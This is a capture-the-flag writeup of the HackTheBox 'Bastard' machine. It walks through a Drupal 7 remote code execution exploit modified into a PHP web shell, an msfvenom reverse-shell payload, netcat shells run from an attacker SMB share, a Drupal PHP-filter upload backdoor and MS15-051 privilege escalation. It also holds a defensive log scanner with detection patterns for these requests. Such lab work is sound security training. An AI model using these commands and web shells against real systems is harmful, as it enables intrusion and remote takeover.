Hackthebox writeup for Bastard machine

Sheetal Patil
5 min read, Jul 18, 2021

Mind Opener

What are the system functions in PHP, and in how many ways can we use them? Can we modify publicly available exploits to get code execution?

If a CMS allows you to add code, can you add code that gives you a shell?

Reconnaissance

nmap -sC -sV -p- 10.10.10.9

The nmap scan reveals several things: open ports 80, 135 and 49154, and accessible files (changelog.txt, robots.txt, etc.).

Enumeration

Use droopescan for enumeration:

git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt

./droopescan scan -u 10.10.10.9

A Google search tells us that this version of Drupal is vulnerable to remote code execution.

Download the exploit for Drupal 7.54 (Exploit-DB 41564):

wget https://www.exploit-db.com/raw/41564 -O 41564.php

Trying to understand the exploit:

If you take a closer look at the exploit, the $file variable defines an associative array with two keys, filename and data.

The data value is PHP code that passes the raw request body to eval. First, I simply ran the exploit without much modification, which returned the error “Failed to login with fake password”. The error is NOT system generated but is returned by the program due to failed code execution.

The error went away when I modified the endpoint to rest: the exploit completed successfully and the file dixuSOspsOUU.php was created; however, the file returns a blank page.

Initial Foothold

So at this point, there are two possibilities we can try:

  1. Generate an msfvenom payload, upload it instead of dixuSOspsOUU.php and grab a reverse shell (what we did on the Granny machine).
  2. Replace the eval() function with the system() function, which gives us command execution.

First method: using an msfvenom payload

msfvenom -a php --platform php -p php/reverse_php LHOST=10.10.14.14 LPORT=4455 -f raw -o myshell.php

Now, modify the exploit with the code below.

With PHP interactive mode, we can check whether the desired parameter values have been passed to our variables.

Next, start a netcat listener on port 4455, browse to the myshell.php file and get a shell.

However, this shell is not stable and stops intermittently.

So, having no option to upload a shell, what more can we try? The next method I tried follows IppSec. The same exploit contains an eval(file_get_contents()) call; here we’ll replace that call with the system function and get a shell.

$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$file = [
    'filename' => 'test.php',
    'data' => '<?php echo(system($_GET["cmd"])); ?>'
];

Upon running the modified PHP exploit, two files are created: session.json and user.json.

Files created on running the exploit

The session file contains session information as follows.

With the help of a cookie editor, copy the session parameters into the browser; this allows you to log in.

Let’s try to access the test.php file that we uploaded with the modified exploit.

We have command execution! Earlier, we tried to gain access via a reverse shell, but it failed. So this time we will upload nc to the target machine and get a bind shell.

This brings me to the next hurdle: how to upload a file to a Windows machine? I read about many methods; for this machine I learnt smbserver.

  1. Using an SMB server
  2. Uploading PHP code through a Drupal module, which gives us code execution and file upload.

1. Get a bind shell with the help of smbserver

I created a share called “tryharder” with smbserver, and placed the nc executable in /home/kali.

Upload nc.exe to the victim machine with the command below:

http://10.10.10.9/test.php?cmd=copy\\10.10.14.19\tryharder\nc.exe

Start a netcat listener and run the command below to get a shell:

http://10.10.10.9/test.php?cmd=nc.exe 10.10.14.19 1234 -e cmd.exe

2. Get a reverse shell by adding PHP code through a Drupal module:

Drupal installations come with multiple modules; we’ll abuse the functionality of one such module to get code execution.

In the Modules section, enable the PHP filter module and save the configuration. Click Add content and add the code given below to be able to upload files to the server.

Note: select the text format as PHP code.

The first part of the code lets us upload a file and write its contents on the server via the fupload variable. The second part allows code execution via the fexec variable.

The code has been added at the /node/2 path.

Next, start a Python HTTP server on the attacker machine:

python3 -m http.server 4545

Serving HTTP on 0.0.0.0 port 4545 (http://0.0.0.0:4545/) …

Upload nc.exe through the fupload variable, then run it through the fexec variable:

/node/2?fupload=nc.exe

/node/2?fexec=nc.exe 10.10.14.19 1234 -e cmd.exe
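A defender-side counterpart to the web shell traffic above (the test.php?cmd= requests and the /node/2?fupload= and fexec= calls): an added example, not code from the writeup, that scans access-log lines for direct requests to PHP files outside Drupal 7’s standard entry points and for command-like query values such as UNC paths, nc.exe and -e cmd.exe. The Common Log Format lines are constructed for the example.

```python
import re
import urllib.parse
from typing import Dict, List

# Drupal 7 ships only these PHP entry points in the web root; a request for any
# other .php file (such as the test.php dropped above) points to a web shell.
DRUPAL7_ENTRYPOINTS = {"/index.php", "/cron.php", "/update.php",
                       "/install.php", "/xmlrpc.php", "/authorize.php"}
# Command-like fragments matching the traffic this writeup generates.
CMD_INDICATORS = [
    re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\"),    # UNC path to a remote share
    re.compile(r"\bnc(?:64)?\.exe\b", re.I),           # netcat binary
    re.compile(r"-e\s+cmd(?:\.exe)?\b", re.I),         # netcat spawning cmd.exe
    re.compile(r"^(?:copy|whoami|powershell|certutil)\b", re.I),
]
# Request part of a Common Log Format line: "GET /path?query HTTP/1.1"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')

def analyse_url(url: str) -> List[str]:
    """Return findings for one request URL; query values are URL-decoded first."""
    parsed = urllib.parse.urlsplit(url)
    findings = []
    if parsed.path.endswith(".php") and parsed.path not in DRUPAL7_ENTRYPOINTS:
        findings.append(f"non-standard PHP file: {parsed.path}")
    for key, values in urllib.parse.parse_qs(parsed.query, keep_blank_values=True).items():
        for value in values:
            if any(p.search(value) for p in CMD_INDICATORS):
                findings.append(f"command-like value in '{key}': {value}")
    return findings

def scan_log(lines: List[str]) -> Dict[int, List[str]]:
    """Map 1-based log line numbers to findings; clean lines are omitted."""
    report = {}
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        hits = analyse_url(m.group("url")) if m else []
        if hits:
            report[n] = hits
    return report

# Constructed sample access log in Common Log Format (not from the writeup).
SAMPLE_LOG = [
    '10.10.14.19 - - [18/Jul/2021:10:00:01 +0000] "GET /index.php?q=node/2 HTTP/1.1" 200 5120',
    '10.10.14.19 - - [18/Jul/2021:10:00:05 +0000] "GET /test.php?cmd=copy+%5C%5C10.10.14.19%5Ctryharder%5Cnc.exe HTTP/1.1" 200 40',
    '10.10.14.19 - - [18/Jul/2021:10:00:09 +0000] "GET /test.php?cmd=nc.exe+10.10.14.19+1234+-e+cmd.exe HTTP/1.1" 200 0',
    '10.10.14.19 - - [18/Jul/2021:10:01:00 +0000] "GET /node/2?fupload=nc.exe HTTP/1.1" 200 80',
]
```

Running scan_log(SAMPLE_LOG) flags lines 2, 3 and 4 and leaves the ordinary index.php request alone.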

Grab the flag from the user’s directory.

Privilege Escalation

Run systeminfo:

This OS version is vulnerable to a known kernel exploit, so we’ll use MS15-051. Download the kernel exploits from SecWiki:

git clone https://github.com/SecWiki/windows-kernel-exploits

Running MS15-051.exe <cmd> executes the given command.

smbserver lets us execute a command without needing to upload it, and since this exploit runs the command with the admin user’s privileges, our reverse shell will be spawned as the admin user.

And grab the flag.

Skills learnt from this box:

  1. Droopescan tool usage
  2. Modifying existing exploits and using PHP interactive mode
  3. Drupal module exploitation
  4. SMB server usage for file uploads and privilege escalation
  5. Using kernel exploits like MS15-051
